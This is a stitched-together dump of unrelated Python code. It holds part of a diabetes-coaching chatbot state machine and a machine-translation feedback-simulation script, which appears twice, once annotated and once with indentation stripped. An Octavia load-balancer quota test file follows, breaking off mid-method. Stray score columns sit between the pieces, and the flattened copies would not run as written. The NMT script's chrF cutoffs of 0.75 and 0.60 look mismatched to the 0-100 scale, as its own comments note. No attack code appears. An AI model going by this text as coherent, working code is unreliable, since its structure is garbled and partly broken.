nextState = "ListGoals"
else:
nextState = "AskDiabetesQuestion"
return [], nextState
def CurrentFeelingsResponse(self, response):
nextState = "AnswerDiabetesQuestions"
self.shortTermData.data["experiences"] = []
self.shortTermData.data["experiences"].append({
"Question": "Are you feeling excited to start? Nervous? What feelings are you having right now?",
"Answer": response,
"session": 1
})
return [], nextState
def AnswerDiabetesQuestionsStatement(self):
if not self.firstTimeDiabetesQuestion:
return "Do you have any other questions?"
else:
self.firstTimeDiabetesQuestion = False
return "Do you have any questions about Type 2 Diabetes So far?"
def AskDiabetesQuestionResponse(self, response):
nextState = "DiabetesAnswer"
self.DiabetesQuestionAnswer = self.DiabetesAnswers.askQuestion(response)
return [], nextState
def ProvideDiabetesAnswer(self):
return self.DiabetesQuestionAnswer
def ListGoalsStatement(self):
statement = "There are two possible goals that you can choose. These are calorie restriction, and sugar reduction. Before we choose a goal, I would like to ask you for a few personal details so that we can ensure that the goal that is chosen is appropriate for you."
if self.generated:
statement = "There are two possible goals that you can choose. These are calorie restriction, and sugar reduction."
return statement
def ListGoalsResponse(self, response):
nextState = "AskGender"
if self.generated:
self.shortTermData.writeData()
nextState = "ListGoals2"
return [], nextState
def AskGenderResponse(self, response):
nextState = "ConfirmGender"
gender = self.responseUtils.DetermineGender(response)
if gender is 0:
self.gender = "female"
elif gender is 1:
self.gender = "male"
else:
self.gender = "undefined"
return [], nextState
def ConfirmGenderStatement(self):
return "Your gender is " + self.gender + ". Do I have that right?"
def ConfirmGenderResponse(self, response):
nextState = "AskGender"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskGender"
else:
self.shortTermData.data["physicalData"]["gender"] = self.gender
nextState = "AskAge"
return [], nextState
def AskAgeResponse(self, response):
nextState = "ConfirmAge"
numbers = self.responseUtils.GetNumber(response)
if len(numbers) > 0:
self.age = numbers[0]
return [], nextState
def ConfirmAgeStatement(self):
return "You are " + str(self.age) + " years old. Is this correct?"
def ConfirmAgeResponse(self, response):
nextState = "AskAge"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskAge"
else:
self.shortTermData.data["physicalData"]["age"] = self.age
self.shortTermData.writeData()
nextState = "AskWeight"
return [], nextState
def AskWeightResponse(self, response):
nextState = "ConfirmWeight"
numbers = self.responseUtils.GetNumber(response)
if len(numbers) > 0:
self.weight = numbers[0]
return [], nextState
def ConfirmWeightStatement(self):
return "Your weight is " + str(self.weight) + " kilograms. Is that right?"
def ConfirmWeightResponse(self, response):
nextState = "AskWeight"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskWeight"
else:
self.shortTermData.data["physicalData"]["weight"] = self.weight
nextState = "AskHeight"
return [], nextState
def AskHeightResponse(self, response):
nextState = "ConfirmHeight"
numbers = self.responseUtils.GetNumber(response)
if len(numbers) > 0:
self.height = numbers[0]
return [], nextState
def ConfirmHeightStatement(self):
return "Your height is " + str(self.height) + " centimeters. Is that correct?"
def ConfirmHeightResponse(self, response):
nextState = "AskHeight"
decision = self.responseUtils.YesOrNo(response)
if decision is 0:
nextState = "AskHeight"
else:
self.shortTermData.data["physicalData"]["height"] = self.height
self.shortTermData.writeData()
nextState = "ListGoals2"
return [], nextState | 0.459319 | 0.366051 |
import os
import sys
import pickle
from typing import List, Tuple, Union
from difflib import ndiff
import torch
from torch.utils.data import DataLoader
import torch.optim as optim
import sentencepiece as spm
import sacrebleu
from hnmt.feedback_requester.util import calculate_entropy
from hnmt.utils import calculate_effort, normalize_effort_scores
from hnmt.nmt.main import get_document_nmt_output
from hnmt.feedback_requester.model import LSTMClassifier
from hnmt.feedback_requester.learned_sampling_AL.model import LearnedALSamplingLSTMClassifier
from hnmt.feedback_requester.data import collate_pad_with_gold_text
from hnmt.feedback_requester.update import POST_FEEDBACK_STRUCT, calculate_post_edited_loss, \
update_model, update_learned_al_model
def main(
    threshold: float,
    model_path: str,
    docs_path: str,
    online_learning: bool = False,
    policy: int = 1,
    active_learning: bool = False,
    al_strategy: str = 'entropy'
):
    """Simulate a translator interacting with the feedback-requester model.

    Loads a pickled list of documents from docs_path (each item is indexed as
    x[1] = NMT hypothesis, x[2] = gold translation -- presumably with model
    features at x[0]; confirm against the preprocessing code), classifies every
    sentence, simulates feedback per ``policy``, optionally updates the model
    online after each document, and saves updated weights.

    Returns a dict of per-document metric lists: 'ksmr' (normalized effort),
    'post_feedback_bleu', 'post_feedback_chrf', 'orig_nmt_out_bleu',
    'orig_nmt_out_chrf', 'percent_sent_requested'.
    """
    # The learned-sampling variant predicts an auxiliary sampling score next
    # to the main prediction, so it needs a different architecture.
    if al_strategy == 'learned_sampling':
        model = LearnedALSamplingLSTMClassifier(1586, 1586)
    else:
        model = LSTMClassifier(1586, 1586)
    model.load_state_dict(torch.load(model_path))
    # NOTE(review): the model is left in eval mode even while being updated
    # online below (dropout etc. stay disabled) -- confirm this is intended.
    model.eval()
    optimizer = optim.Adam(model.parameters())
    # Per-document accumulators for the returned metrics.
    effort_scores = []
    bleu_scores = []
    chrf_scores = []
    orig_bleu = []
    orig_chrf = []
    precent_sents_requested = []
    with open(docs_path, "rb") as f:
        documents = pickle.load(f)
    for document in documents:
        dataloader = DataLoader(document, batch_size=16, shuffle=False, num_workers=0,
                                collate_fn=collate_pad_with_gold_text, pin_memory=True)
        document_effort = 0
        gold_translations = [x[2] for x in document]
        post_interactive = []   # final sentence (or training struct) per sentence
        all_sys_obj_predictions = torch.empty(0)
        total_requested = 0
        post_edited = []        # post-edited references for the online update
        for batch in dataloader:
            if al_strategy == 'learned_sampling':
                predictions, sys_obj_predictions = model(batch[0])
                predictions = predictions.squeeze()
                sys_obj_predictions = sys_obj_predictions.squeeze()
                all_sys_obj_predictions = torch.cat((all_sys_obj_predictions, sys_obj_predictions))
            else:
                predictions = model(batch[0]).squeeze()
            for i, prediction in enumerate(predictions):
                nmt_hypo = batch[1][i]
                gold_translation = batch[2][i]
                # sys_obj_predictions only exists on the learned-sampling path.
                sys_obj_pred = sys_obj_predictions[i] if al_strategy == 'learned_sampling' else None
                request_feedback = should_request_feedback(threshold, prediction, active_learning,
                                                           al_strategy, sys_obj_pred)
                if request_feedback:
                    total_requested += 1
                    sent_effort_score, final_sent = do_policy_feedback_and_post_edit(nmt_hypo,
                                                                                     gold_translation,
                                                                                     policy)
                    document_effort += sent_effort_score
                    feedback = get_prompted_feedback(online_learning, prediction, nmt_hypo, final_sent)
                    post_interactive.append(feedback)
                else:
                    no_feedback_struct = get_unprompted_struct(online_learning, prediction, nmt_hypo)
                    post_interactive.append(no_feedback_struct)
                if online_learning:
                    posted_edited_sent = policy_post_edit_for_updating(nmt_hypo, gold_translation, policy)
                    post_edited.append(posted_edited_sent)
        doc_bleu_score, doc_chrf_score = calculate_bleu_and_chrf_scores(post_interactive,
                                                                        online_learning,
                                                                        gold_translations)
        effort_scores.append(document_effort)
        bleu_scores.append(doc_bleu_score)
        chrf_scores.append(doc_chrf_score)
        orig_out_bleu, orig_out_chrf, percent_requested = calculate_additional_stats(document,
                                                                                     gold_translations,
                                                                                     total_requested)
        orig_bleu.append(orig_out_bleu)
        orig_chrf.append(orig_out_chrf)
        precent_sents_requested.append(percent_requested)
        if online_learning:
            # Update the model once per document from the collected feedback.
            if al_strategy == 'learned_sampling':
                update_learned_al_model(model, optimizer, post_interactive, post_edited, all_sys_obj_predictions)
            else:
                update_model(model, optimizer, post_interactive, post_edited)
            # NOTE(review): weights are re-saved after every document update
            # (indentation reconstructed from a flattened source) -- confirm
            # whether a single save after the loop was intended.
            current_dir = os.path.dirname(os.path.realpath(__file__))
            name = f"online_updated_policy={policy}_al={active_learning}_ALstrategy={al_strategy}.pt"
            weights_updated_path = current_dir + "/saved_state_dicts/" + name
            torch.save(model.state_dict(), weights_updated_path)
            print("\nModel weights saved at {}.\n".format(weights_updated_path))
    return {
        'ksmr': normalize_effort_scores(effort_scores),
        'post_feedback_bleu': bleu_scores,
        'post_feedback_chrf': chrf_scores,
        'orig_nmt_out_bleu': orig_bleu,
        'orig_nmt_out_chrf': orig_chrf,
        'percent_sent_requested': precent_sents_requested
    }
def should_request_feedback(
    threshold: float,
    prediction: torch.Tensor,
    active_learning: bool,
    al_strategy: str,
    sys_pred: torch.Tensor
) -> bool:
    """Decide whether to ask the translator for feedback on this sentence.

    Without active learning the raw model prediction is compared against the
    threshold directly. With active learning, a combined score is used:
    'entropy' mixes prediction entropy into the score, 'learned_sampling'
    mixes in the learned sampling head's output.

    Raises ValueError for an unknown strategy when active learning is on.
    """
    if not active_learning:
        return prediction >= threshold
    if al_strategy == 'entropy':
        score = 0.5 * calculate_entropy(prediction) + 0.7 * prediction
    elif al_strategy == 'learned_sampling':
        score = 10 * sys_pred + 0.6 * prediction
    else:
        raise ValueError(f'Unsupported active learning strategy {al_strategy}')
    return score >= threshold
def calculate_additional_stats(
    document: List[Tuple[torch.Tensor, str, str]],
    gold_translations: List[str],
    total_requested: int
):
    """Score the raw NMT output and report the fraction of sentences queried.

    Returns (corpus BLEU, corpus chrF, requested-sentence fraction) for the
    unedited hypotheses in ``document`` against ``gold_translations``.
    """
    hypotheses = [entry[1] for entry in document]
    bleu = sacrebleu.corpus_bleu(hypotheses, [gold_translations], lowercase=True).score
    chrf = sacrebleu.corpus_chrf(hypotheses, [gold_translations]).score
    requested_fraction = total_requested / len(document)
    return bleu, chrf, requested_fraction
def get_prompted_feedback(
    online_learning: bool,
    prediction: torch.Tensor,
    nmt_hypo: str,
    final_sent: str
) -> Union[str, POST_FEEDBACK_STRUCT]:
    """Package the outcome of a sentence the requester asked feedback for.

    With online learning enabled, returns the training struct
    (prediction, 1 = was prompted, hypothesis, corrected sentence);
    otherwise just the corrected sentence.
    """
    return (prediction, 1, nmt_hypo, final_sent) if online_learning else final_sent
def get_unprompted_struct(
    online_learning: bool,
    prediction: torch.Tensor,
    nmt_hypo: str
) -> Union[str, POST_FEEDBACK_STRUCT]:
    """Package the outcome of a sentence that was NOT sent for feedback.

    With online learning enabled, returns the training struct
    (prediction, 0 = not prompted, hypothesis, hypothesis kept as final);
    otherwise just the unmodified hypothesis.
    """
    return (prediction, 0, nmt_hypo, nmt_hypo) if online_learning else nmt_hypo
def calculate_bleu_and_chrf_scores(
    post_interactive: Union[List[str], List[POST_FEEDBACK_STRUCT]],
    online_learning: bool,
    gold_translations: List[str]
) -> Tuple[float, float]:
    """Corpus BLEU and chrF of the post-interaction sentences against gold.

    When online learning is on, ``post_interactive`` holds 4-tuple training
    structs whose final sentence sits in slot 3; otherwise it is already a
    plain list of sentences.
    """
    if online_learning:
        hypotheses = [struct[3] for struct in post_interactive]
    else:
        hypotheses = post_interactive
    return (
        sacrebleu.corpus_bleu(hypotheses, [gold_translations], lowercase=True).score,
        sacrebleu.corpus_chrf(hypotheses, [gold_translations]).score,
    )
def do_policy_feedback_and_post_edit(
    nmt_hypo: str,
    gold_translation: str,
    policy: int
) -> Tuple[float, str]:
    """
    Return the sentence effort score and the final translation based on the policy.
    Policy #1: the translator fully corrects every sentence, so the final
        translation is always the gold reference.
    Policy #2 (any other value): the sentence is fixed/replaced with the gold
        reference only when its chrF score against the reference is <= 0.75;
        otherwise the NMT hypothesis is kept unchanged.
    (Docstring corrected: it previously described 0.95/0.70 thresholds, but the
    code uses a single 0.75 cutoff.)
    NOTE(review): sacrebleu's .score is conventionally on a 0-100 scale, so a
    0.75 cutoff would almost never trigger -- confirm the intended scale/version.
    """
    if policy == 1:
        sent_effort_score = calculate_effort(nmt_hypo, gold_translation)
        return sent_effort_score, gold_translation
    else:
        chrf_score = sacrebleu.sentence_chrf(nmt_hypo, [gold_translation]).score
        if chrf_score <= 0.75:
            sent_effort_score = calculate_effort(nmt_hypo, gold_translation)
            return sent_effort_score, gold_translation
        else:
            # Hypothesis kept as-is; effort of a string against itself is
            # presumably zero -- confirm calculate_effort(x, x) == 0.
            sent_effort_score = calculate_effort(nmt_hypo, nmt_hypo)
            return sent_effort_score, nmt_hypo
def policy_post_edit_for_updating(
    nmt_hypo: str,
    gold_translation: str,
    policy: int
) -> str:
    """
    Return the post-edited sentence used for the online model update.
    Policy #1: the translator fully corrects each sentence, so the gold
        reference is always returned.
    Policy #2 (any other value): the hypothesis is replaced with the gold
        reference only when its chrF score against the reference is <= 0.60;
        otherwise the hypothesis is returned unchanged.
    (Docstring corrected: it previously said 0.70, but the code uses 0.60.)
    NOTE(review): sacrebleu's .score is conventionally on a 0-100 scale, so the
    0.60 cutoff would almost never trigger -- confirm the intended scale.
    """
    if policy == 1:
        return gold_translation
    else:
        chrf_score = sacrebleu.sentence_chrf(nmt_hypo, [gold_translation]).score
        if chrf_score <= 0.60:
            return gold_translation
        return nmt_hypo
# Run all five experimental conditions and pickle their metrics next to this file.
# FIX: removed dataset-extraction residue fused onto the final line.
if __name__ == "__main__":
    current_dir = os.path.dirname(os.path.realpath(__file__))
    # Pretrained feedback-requester checkpoints (absolute, machine-specific paths).
    MODEL_PATH = '/Users/paigefink/human-assisted-nmt/hnmt/feedback_requester/saved_state_dicts/baseline/epoch_4.pt'
    LEARNED_AL_MODEL_PATH = '/Users/paigefink/human-assisted-nmt/hnmt/feedback_requester/learned_sampling_AL/saved_state_dicts/epoch_4.pt'
    DOCS_PATH = current_dir + "/preprocessed_docs/docs_60k_sents.p"
    # Policy 1, offline.
    policy_1_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=False)
    with open(current_dir + "/scores_pol_1.p", 'wb') as f:
        pickle.dump(policy_1_stats, f)
    # Policy 2, offline.
    policy_2_stats = main(0.5, MODEL_PATH, DOCS_PATH, policy=2, online_learning=False)
    with open(current_dir + "/scores_pol_2.p", 'wb') as f:
        pickle.dump(policy_2_stats, f)
    # Policy 2 with online model updates, no active learning.
    policy_2_online_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=True,
                                 policy=2, active_learning=False)
    with open(current_dir + "/scores_pol_2_online.p", 'wb') as f:
        pickle.dump(policy_2_online_stats, f)
    # Policy 2, online, entropy-based active learning.
    policy_2_AL_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=True, policy=2,
                             active_learning=True, al_strategy="entropy")
    with open(current_dir + "/scores_pol_2_AL.p", 'wb') as f:
        pickle.dump(policy_2_AL_stats, f)
    # Policy 2, online, learned-sampling active learning (separate checkpoint).
    policy_2_learned_sampling_AL_stats = main(0.5,
                                              LEARNED_AL_MODEL_PATH,
                                              DOCS_PATH,
                                              online_learning=True,
                                              policy=2,
                                              active_learning=True,
                                              al_strategy="learned_sampling")
    with open(current_dir + "/scores_pol_2_learned_AL.p", 'wb') as f:
        pickle.dump(policy_2_learned_sampling_AL_stats, f)
import sys
import pickle
from typing import List, Tuple, Union
from difflib import ndiff
import torch
from torch.utils.data import DataLoader
import torch.optim as optim
import sentencepiece as spm
import sacrebleu
from hnmt.feedback_requester.util import calculate_entropy
from hnmt.utils import calculate_effort, normalize_effort_scores
from hnmt.nmt.main import get_document_nmt_output
from hnmt.feedback_requester.model import LSTMClassifier
from hnmt.feedback_requester.learned_sampling_AL.model import LearnedALSamplingLSTMClassifier
from hnmt.feedback_requester.data import collate_pad_with_gold_text
from hnmt.feedback_requester.update import POST_FEEDBACK_STRUCT, calculate_post_edited_loss, \
update_model, update_learned_al_model
def main(
threshold: float,
model_path: str,
docs_path: str,
online_learning: bool = False,
policy: int = 1,
active_learning: bool = False,
al_strategy: str = 'entropy'
):
if al_strategy == 'learned_sampling':
model = LearnedALSamplingLSTMClassifier(1586, 1586)
else:
model = LSTMClassifier(1586, 1586)
model.load_state_dict(torch.load(model_path))
model.eval()
optimizer = optim.Adam(model.parameters())
effort_scores = []
bleu_scores = []
chrf_scores = []
orig_bleu = []
orig_chrf = []
precent_sents_requested = []
with open(docs_path, "rb") as f:
documents = pickle.load(f)
for document in documents:
dataloader = DataLoader(document, batch_size=16, shuffle=False, num_workers=0,
collate_fn=collate_pad_with_gold_text, pin_memory=True)
document_effort = 0
gold_translations = [x[2] for x in document]
post_interactive = []
all_sys_obj_predictions = torch.empty(0)
total_requested = 0
post_edited = []
for batch in dataloader:
if al_strategy == 'learned_sampling':
predictions, sys_obj_predictions = model(batch[0])
predictions = predictions.squeeze()
sys_obj_predictions = sys_obj_predictions.squeeze()
all_sys_obj_predictions = torch.cat((all_sys_obj_predictions, sys_obj_predictions))
else:
predictions = model(batch[0]).squeeze()
for i, prediction in enumerate(predictions):
nmt_hypo = batch[1][i]
gold_translation = batch[2][i]
sys_obj_pred = sys_obj_predictions[i] if al_strategy == 'learned_sampling' else None
request_feedback = should_request_feedback(threshold, prediction, active_learning,
al_strategy, sys_obj_pred)
if request_feedback:
total_requested += 1
sent_effort_score, final_sent = do_policy_feedback_and_post_edit(nmt_hypo,
gold_translation,
policy)
document_effort += sent_effort_score
feedback = get_prompted_feedback(online_learning, prediction, nmt_hypo, final_sent)
post_interactive.append(feedback)
else:
no_feedback_struct = get_unprompted_struct(online_learning, prediction, nmt_hypo)
post_interactive.append(no_feedback_struct)
if online_learning:
posted_edited_sent = policy_post_edit_for_updating(nmt_hypo, gold_translation, policy)
post_edited.append(posted_edited_sent)
doc_bleu_score, doc_chrf_score = calculate_bleu_and_chrf_scores(post_interactive,
online_learning,
gold_translations)
effort_scores.append(document_effort)
bleu_scores.append(doc_bleu_score)
chrf_scores.append(doc_chrf_score)
orig_out_bleu, orig_out_chrf, percent_requested = calculate_additional_stats(document,
gold_translations,
total_requested)
orig_bleu.append(orig_out_bleu)
orig_chrf.append(orig_out_chrf)
precent_sents_requested.append(percent_requested)
if online_learning:
if al_strategy == 'learned_sampling':
update_learned_al_model(model, optimizer, post_interactive, post_edited, all_sys_obj_predictions)
else:
update_model(model, optimizer, post_interactive, post_edited)
current_dir = os.path.dirname(os.path.realpath(__file__))
name = f"online_updated_policy={policy}_al={active_learning}_ALstrategy={al_strategy}.pt"
weights_updated_path = current_dir + "/saved_state_dicts/" + name
torch.save(model.state_dict(), weights_updated_path)
print("\nModel weights saved at {}.\n".format(weights_updated_path))
return {
'ksmr': normalize_effort_scores(effort_scores),
'post_feedback_bleu': bleu_scores,
'post_feedback_chrf': chrf_scores,
'orig_nmt_out_bleu': orig_bleu,
'orig_nmt_out_chrf': orig_chrf,
'percent_sent_requested': precent_sents_requested
}
def should_request_feedback(
threshold: float,
prediction: torch.Tensor,
active_learning: bool,
al_strategy: str,
sys_pred: torch.Tensor
) -> bool:
if active_learning:
if al_strategy == 'entropy':
return 0.5 * calculate_entropy(prediction) + 0.7 * prediction >= threshold
elif al_strategy == 'learned_sampling':
return 10 * sys_pred + 0.6 * prediction >= threshold
else:
raise ValueError(f'Unsupported active learning strategy {al_strategy}')
return prediction >= threshold
def calculate_additional_stats(
document: List[Tuple[torch.Tensor, str, str]],
gold_translations: List[str],
total_requested: int
):
nmt_out_sents = [x[1] for x in document]
original_nmt_output_bleu = sacrebleu.corpus_bleu(nmt_out_sents, [gold_translations], lowercase=True).score
original_nmt_output_chrf = sacrebleu.corpus_chrf(nmt_out_sents, [gold_translations]).score
percent_requested = total_requested / len(document)
return original_nmt_output_bleu, original_nmt_output_chrf, percent_requested
def get_prompted_feedback(
online_learning: bool,
prediction: torch.Tensor,
nmt_hypo: str,
final_sent: str
) -> Union[str, POST_FEEDBACK_STRUCT]:
if online_learning:
return (prediction, 1, nmt_hypo, final_sent)
return final_sent
def get_unprompted_struct(
online_learning: bool,
prediction: torch.Tensor,
nmt_hypo: str
) -> Union[str, POST_FEEDBACK_STRUCT]:
if online_learning:
return (prediction, 0, nmt_hypo, nmt_hypo)
return nmt_hypo
def calculate_bleu_and_chrf_scores(
post_interactive: Union[List[str], List[POST_FEEDBACK_STRUCT]],
online_learning: bool,
gold_translations: List[str]
) -> Tuple[float, float]:
if online_learning:
references = [x[3] for x in post_interactive]
else:
references = post_interactive
bleu_score = sacrebleu.corpus_bleu(references, [gold_translations], lowercase=True).score
chrf_score = sacrebleu.corpus_chrf(references, [gold_translations]).score
return bleu_score, chrf_score
def do_policy_feedback_and_post_edit(
nmt_hypo: str,
gold_translation: str,
policy: int
) -> Tuple[float, str]:
"""
Return the sentence effort score and the final translation based on the policy.
Policy #1: the translator will fully correct each sentence always (when prompted or post-editing)
Policy #2: if asked by the feedback-requester and the chrF score is <= 0.95: fix/replace
if not asked by the feedback-requester (i.e. post-editing) and the chrF score is <= 0.70: fix/replace
"""
if policy == 1:
sent_effort_score = calculate_effort(nmt_hypo, gold_translation)
return sent_effort_score, gold_translation
else:
chrf_score = sacrebleu.sentence_chrf(nmt_hypo, [gold_translation]).score
if chrf_score <= 0.75:
sent_effort_score = calculate_effort(nmt_hypo, gold_translation)
return sent_effort_score, gold_translation
else:
sent_effort_score = calculate_effort(nmt_hypo, nmt_hypo)
return sent_effort_score, nmt_hypo
def policy_post_edit_for_updating(
nmt_hypo: str,
gold_translation: str,
policy: int
) -> str:
"""
Policy #1: the translator will fully correct each sentence always (when prompted or post-editing)
Policy #2: if not asked by the feedback-requester (i.e. post-editing) and the chrF score is <= 0.70: fix/replace
"""
if policy == 1:
return gold_translation
else:
chrf_score = sacrebleu.sentence_chrf(nmt_hypo, [gold_translation]).score
if chrf_score <= 0.60:
return gold_translation
return nmt_hypo
if __name__ == "__main__":
current_dir = os.path.dirname(os.path.realpath(__file__))
MODEL_PATH = '/Users/paigefink/human-assisted-nmt/hnmt/feedback_requester/saved_state_dicts/baseline/epoch_4.pt'
LEARNED_AL_MODEL_PATH = '/Users/paigefink/human-assisted-nmt/hnmt/feedback_requester/learned_sampling_AL/saved_state_dicts/epoch_4.pt'
DOCS_PATH = current_dir + "/preprocessed_docs/docs_60k_sents.p"
policy_1_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=False)
with open(current_dir + "/scores_pol_1.p", 'wb') as f:
pickle.dump(policy_1_stats, f)
policy_2_stats = main(0.5, MODEL_PATH, DOCS_PATH, policy=2, online_learning=False)
with open(current_dir + "/scores_pol_2.p", 'wb') as f:
pickle.dump(policy_2_stats, f)
policy_2_online_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=True,
policy=2, active_learning=False)
with open(current_dir + "/scores_pol_2_online.p", 'wb') as f:
pickle.dump(policy_2_online_stats, f)
policy_2_AL_stats = main(0.5, MODEL_PATH, DOCS_PATH, online_learning=True, policy=2,
active_learning=True, al_strategy="entropy")
with open(current_dir + "/scores_pol_2_AL.p", 'wb') as f:
pickle.dump(policy_2_AL_stats, f)
policy_2_learned_sampling_AL_stats = main(0.5,
LEARNED_AL_MODEL_PATH,
DOCS_PATH,
online_learning=True,
policy=2,
active_learning=True,
al_strategy="learned_sampling")
with open(current_dir + "/scores_pol_2_learned_AL.p", 'wb') as f:
pickle.dump(policy_2_learned_sampling_AL_stats, f) | 0.52683 | 0.22531 |
import random
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
CONF = cfg.CONF
class TestClusterQuotas(base.BaseAPITest):
    """Functional tests for the cluster-quota API endpoints.

    Exercises GET/PUT/DELETE on the clusterquota resource, including
    RBAC behavior, which is tested by switching the API to TESTING auth
    and faking the keystone policy values for a request.
    """

    root_tag = 'clusterquota'

    # Every configurable clusterquota field; used both to build request
    # bodies and to read the configured defaults for comparison.
    _CLUSTERQUOTA_FIELDS = (
        'cluster_total_loadbalancers',
        'max_healthmonitors_per_pool',
        'max_listeners_per_loadbalancer',
        'max_members_per_pool',
        'max_pools_per_loadbalancer',
        'max_l7policies_per_listener',
        'max_l7rules_per_l7policy',
    )

    def setUp(self):
        super(TestClusterQuotas, self).setUp()
        conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
        # Randomize each limit between QUOTA_UNLIMITED and 8999 so a
        # different configuration is exercised on every run.
        for option in ('cluster_total_loadbalancers',
                       'max_healthmonitors_per_pool',
                       'max_listeners_per_loadbalancer',
                       'max_pools_per_loadbalancer',
                       'max_l7policies_per_listener',
                       'max_l7rules_per_l7policy'):
            conf.config(
                group="clusterquotas",
                **{option: random.randrange(
                    constants.QUOTA_UNLIMITED, 9000)})
        # We need to make sure unlimited gets tested each pass
        conf.config(
            group="clusterquotas",
            max_members_per_pool=constants.QUOTA_UNLIMITED)

    def _assert_clusterquotas_equal(self, observed, expected=None):
        """Assert every quota field in *observed* matches *expected*.

        When *expected* is None, compare against the values currently
        configured in the [clusterquotas] section.
        """
        # 'is None' (not truthiness) so an explicitly passed empty dict
        # is not silently replaced by the configured defaults.
        if expected is None:
            expected = {field: getattr(CONF.clusterquotas, field)
                        for field in self._CLUSTERQUOTA_FIELDS}
        for field in self._CLUSTERQUOTA_FIELDS:
            self.assertEqual(expected[field], observed[field])

    def _full_clusterquota_body(self):
        """Return a request body setting every quota field to 30."""
        return {'clusterquota': {field: 30
                                 for field in self._CLUSTERQUOTA_FIELDS}}

    @staticmethod
    def _build_credentials(project_id, roles):
        """Build the fake policy-values dict for an authenticated request."""
        return {
            'service_user_id': None,
            'user_domain_id': None,
            'is_admin_project': True,
            'service_project_domain_id': None,
            'service_project_id': None,
            'roles': roles,
            'user_id': None,
            'is_admin': False,
            'service_user_domain_id': None,
            'project_domain_id': None,
            'service_roles': [],
            'project_id': project_id}

    def _use_testing_auth(self):
        """Switch the API to TESTING auth; return the strategy to restore."""
        self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
        auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
        self.conf.config(group='api_settings',
                         auth_strategy=constants.TESTING)
        return auth_strategy

    def _restore_auth(self, auth_strategy):
        """Restore the auth strategy saved by _use_testing_auth."""
        self.conf.config(group='api_settings', auth_strategy=auth_strategy)

    def _request_as(self, project_id, roles, request, *args, **kwargs):
        """Issue *request* while impersonating *project_id* with *roles*.

        Patches the request context's project id and policy values for
        the duration of the call, then restores the auth strategy.
        Returns the response object from *request*.
        """
        auth_strategy = self._use_testing_auth()
        with mock.patch.object(octavia.common.context.Context, 'project_id',
                               project_id):
            with mock.patch(
                    "oslo_context.context.RequestContext.to_policy_values",
                    return_value=self._build_credentials(project_id, roles)):
                response = request(*args, **kwargs)
        self._restore_auth(auth_strategy)
        return response

    def test_get(self):
        clusterquota1 = self.set_clusterquota(
            cluster_total_loadbalancers=1, max_members_per_pool=1
        ).get(self.root_tag)
        clusterquotas = self.get(
            self.CLUSTERQUOTAS_PATH
        ).json.get(self.root_tag)
        self._assert_clusterquotas_equal(clusterquotas, clusterquota1)

    def test_get_Authorized_admin(self):
        self._test_get_Authorized('load-balancer_admin')

    def _test_get_Authorized(self, role):
        """GET with *role* must succeed and return the stored quotas."""
        project1_id = uuidutils.generate_uuid()
        clusterquota1 = self.set_clusterquota(
            cluster_total_loadbalancers=1, max_members_per_pool=1
        ).get(self.root_tag)
        response = self._request_as(
            project1_id, [role], self.get, self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(
            response.json.get(self.root_tag), clusterquota1)

    def test_get_not_Authorized(self):
        # No credentials are faked here at all, so the request is
        # rejected outright under TESTING auth.
        self.set_clusterquota(
            cluster_total_loadbalancers=1, max_members_per_pool=1
        ).get(self.root_tag)
        auth_strategy = self._use_testing_auth()
        clusterquotas = self.get(self.CLUSTERQUOTAS_PATH,
                                 status=403)
        self._restore_auth(auth_strategy)
        self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)

    def test_get_not_Authorized_bogus_role(self):
        self._test_get_not_Authorized_roles(['load-balancer:bogus'])

    def test_get_not_Authorized_no_role(self):
        self._test_get_not_Authorized_roles([])

    def _test_get_not_Authorized_roles(self, roles):
        """GET with insufficient *roles* must be rejected with 403."""
        project1_id = uuidutils.generate_uuid()
        self.set_clusterquota(
            cluster_total_loadbalancers=1, max_members_per_pool=1
        ).get(self.root_tag)
        clusterquotas = self._request_as(
            project1_id, roles, self.get, self.CLUSTERQUOTAS_PATH,
            status=403)
        self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)

    def test_get_default_clusterquotas(self):
        response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'])

    def test_get_default_clusterquotas_Authorized(self):
        response = self._request_as(
            self.project_id, ['load-balancer_admin'],
            self.get, self.CLUSTERQUOTAS_DEFAULT_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'])

    def test_get_default_clusterquotas_not_Authorized(self):
        # Only the project id is patched (no policy values), so the
        # request lacks valid credentials and must be rejected.
        auth_strategy = self._use_testing_auth()
        with mock.patch.object(octavia.common.context.Context, 'project_id',
                               uuidutils.generate_uuid()):
            response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH,
                                status=403)
            self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
        self._restore_auth(auth_strategy)

    def test_custom_clusterquotas(self):
        body = self._full_clusterquota_body()
        self.put(self.CLUSTERQUOTAS_PATH, body, status=202)
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'],
                                         expected=body['clusterquota'])

    def test_custom_clusterquotas_admin(self):
        body = self._full_clusterquota_body()
        self._request_as(self.project_id, ['load-balancer_admin'],
                         self.put, self.CLUSTERQUOTAS_PATH, body, status=202)
        response = self.get(self.CLUSTERQUOTAS_PATH)
        self._assert_clusterquotas_equal(response.json['clusterquota'],
                                         expected=body['clusterquota'])

    def test_custom_clusterquotas_not_Authorized_member(self):
        body = self._full_clusterquota_body()
        response = self._request_as(
            self.project_id, ['load-balancer_member'],
            self.put, self.CLUSTERQUOTAS_PATH, body, status=403)
        self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)

    def test_custom_partial_clusterquotas(self):
        # A field explicitly set to None falls back to the configured
